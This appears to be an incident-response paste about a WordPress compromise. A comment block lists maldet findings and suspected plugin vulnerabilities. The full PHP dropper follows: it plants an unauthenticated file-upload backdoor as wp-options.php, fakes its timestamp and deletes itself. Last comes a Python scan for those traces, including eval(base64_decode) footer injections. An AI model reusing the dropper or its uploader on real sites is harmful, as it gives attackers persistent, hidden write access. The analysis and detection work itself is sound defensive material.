/* Found a suspicious backdoor that modifies wp-options.php in the wp-admin directory, moves it to the WordPress root, then removes itself. It was placed by an unknown backdoor and sits silently waiting for a request made directly to frommshead.php.
Possible backdoors may be cmdshell files; maldet found these files in production:
wp-includes/js/thickbox/rvbt28.php
wp-includes/class-wp-xmlrpc.php
wp-content/themes/agentpress/mtgh.php
The backdoors may have been placed through one or more vulnerabilities. A couple to note that were found in production, although it is not 100% certain which exploit was used:
http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html
http://blog.sucuri.net/2014/12/revslider-vulnerability-leads-to-massive-wordpress-soaksoak-compromise.html
One backdoor has placed eval(base64_decode) in the footer.php of every directory under /themes/ and leaves a comment stating it's wp cache code. It may be unrelated to frommshead.php but could have used one of the backdoors listed above.
Still seeking possible backdoors that have evaded maldet.
*/
<?php
$DEBUG_MODE=false;
// Creating wp-admin/wp-options.php (uploader)
$file_data_head ="<?php
if(isset(#_POST['Submit'])){
#filedir = '';
#maxfile = '2888888';
#userfile_name = #_FILES['image']['name'];
#userfile_tmp = #_FILES['image']['tmp_name'];
if (isset(#_FILES['image']['name'])) {
#abod = #filedir.#userfile_name;
@move_uploaded_file(#userfile_tmp, #abod);
}
}
else{
echo'<form method=\"POST\" action=\"\" enctype=\"multipart/form-data\"><input type=\"file\" name=\"image\"><input type=\"Submit\" name=\"Submit\" value=\"Submit\"></form>';
}
?>";
echo"<br>---------------------------- Create wp-admin/wp-options.php (uploader) ---------------------------------<br><br>";
if (file_put_contents("wp-optionstmp.php", str_replace("#", "$", $file_data_head))) {
    touch("wp-optionstmp.php", mktime(12, 17, 11, 12, 31, 2013));
    echo"Proceeded: ".$start."/wp-admin/wp-options.php > Succesfull<br>";
} else {
    echo"Proceeded: ".$start."/wp-admin/wp-options.php > Error!<br>";
}
$file = 'wp-optionstmp.php';
$newfile = '../wp-options.php';
echo"<br>---------------------------- Move wp-admin/wp-options.php > To root folder ---------------------------------<br><br>";
if (rename($file,$newfile)) {
    touch("../wp-options.php", mktime(12, 17, 11, 12, 31, 2013));
    echo"Proceeded: ".$start."/wp-options.php > Succesfull<br>";
} else {
    echo"Proceeded: ".$start."/wp-options.php > Error!<br>";
}
$file='frommshead.php';
echo"<br>---------------------------- Remove frommshead.php (Remove files) ---------------------------------<br><br>";
touch("frommshead.php", mktime(12, 17, 11, 12, 31, 2013));
unlink($file);
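
A triage scan for the traces this dropper and the footer.php injection leave behind, added here as an example and not part of the original paste or of maldet. The file names and the touch() timestamp come from the code above; the function names, reason labels and sample tree are constructed for illustration.

```python
import calendar, os, re, tempfile

# touch() in the dropper uses mktime(12, 17, 11, 12, 31, 2013); mktime() applies
# PHP's configured timezone, so the resulting epoch value differs per server.
STOMP_UTC = calendar.timegm((2013, 12, 31, 12, 17, 11))
DROPPED_NAMES = {"wp-options.php", "wp-optionstmp.php", "frommshead.php"}
EVAL_B64 = re.compile(rb"eval\s*\(\s*base64_decode\s*\(")

def is_stomped(mtime):
    """True if mtime reads 2013-12-31 12:17:11 at some UTC offset (15-min steps)."""
    delta = int(mtime) - STOMP_UTC
    return abs(delta) <= 14 * 3600 and delta % 900 == 0

def scan(wp_root):
    """Return sorted (relative path, reason) findings for PHP files under wp_root."""
    findings = []
    for dirpath, _dirs, files in os.walk(wp_root):
        for name in (f for f in files if f.endswith(".php")):
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, wp_root).replace(os.sep, "/")
            if name in DROPPED_NAMES:
                findings.append((rel, "dropper-filename"))
            if is_stomped(os.stat(path).st_mtime):
                findings.append((rel, "stomped-mtime"))
            if name == "footer.php" and "/themes/" in "/" + rel:
                with open(path, "rb") as fh:
                    if EVAL_B64.search(fh.read()):
                        findings.append((rel, "eval-base64-footer"))
    return sorted(findings)

def build_sample(root):
    """Constructed sample tree: planted indicators plus clean control files."""
    files = {
        "wp-options.php": (b"<?php /* placeholder */", STOMP_UTC + 5 * 3600),
        "wp-content/themes/demo/footer.php":
            (b"<?php eval(base64_decode('')); // wp cache", 1420070400),
        "wp-content/themes/clean/footer.php": (b"<?php wp_footer();", 1420070400),
        "wp-includes/version.php": (b"<?php", STOMP_UTC + 61),
    }
    for rel, (body, mtime) in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body)
        os.utime(path, (mtime, mtime))

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for rel, reason in scan(tmp):
            print(f"{reason:20} {rel}")
```

touch() rewrites mtime but not ctime, so comparing the two on a flagged file shows when it was really written.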